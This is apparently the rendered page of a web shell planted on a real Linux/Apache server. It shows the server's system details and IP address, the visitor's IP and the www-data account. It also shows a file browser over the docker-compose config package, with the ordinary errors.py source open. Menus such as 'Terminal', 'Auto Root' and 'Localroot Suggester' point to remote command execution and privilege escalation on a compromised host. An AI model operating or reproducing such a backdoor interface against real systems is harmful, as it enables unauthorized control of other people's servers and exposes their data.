Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
compose /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2024-07-10 10:57
__init__.py
377
B
-rw-r--r--
2021-05-10 10:30
compose_spec.json
25.13
KB
-rw-r--r--
2021-05-10 10:30
config.py
48.92
KB
-rw-r--r--
2021-05-10 10:30
config_schema_v1.json
5.7
KB
-rw-r--r--
2021-05-10 10:30
environment.py
3.77
KB
-rw-r--r--
2021-05-10 10:30
errors.py
1.68
KB
-rw-r--r--
2021-05-10 10:30
interpolation.py
9.82
KB
-rw-r--r--
2021-05-10 10:30
serialize.py
4.97
KB
-rw-r--r--
2021-05-10 10:30
sort_services.py
2.43
KB
-rw-r--r--
2021-05-10 10:30
types.py
15.44
KB
-rw-r--r--
2021-05-10 10:30
validation.py
19.43
KB
-rw-r--r--
2021-05-10 10:30
Save
Rename
VERSION_EXPLANATION = ( 'You might be seeing this error because you\'re using the wrong Compose file version. ' 'Either specify a supported version (e.g "2.2" or "3.3") and place ' 'your service definitions under the `services` key, or omit the `version` key ' 'and place your service definitions at the root of the file to use ' 'version 1.\nFor more on the Compose file format versions, see ' 'https://docs.docker.com/compose/compose-file/') class ConfigurationError(Exception): def __init__(self, msg): self.msg = msg def __str__(self): return self.msg class EnvFileNotFound(ConfigurationError): pass class DependencyError(ConfigurationError): pass class CircularReference(ConfigurationError): def __init__(self, trail): self.trail = trail @property def msg(self): lines = [ "{} in {}".format(service_name, filename) for (filename, service_name) in self.trail ] return "Circular reference:\n {}".format("\n extends ".join(lines)) class ComposeFileNotFound(ConfigurationError): def __init__(self, supported_filenames): super().__init__(""" Can't find a suitable configuration file in this directory or any parent. Are you in the right directory? Supported filenames: %s """ % ", ".join(supported_filenames)) class DuplicateOverrideFileFound(ConfigurationError): def __init__(self, override_filenames): self.override_filenames = override_filenames super().__init__( "Multiple override files found: {}. You may only use a single " "override file.".format(", ".join(override_filenames)) )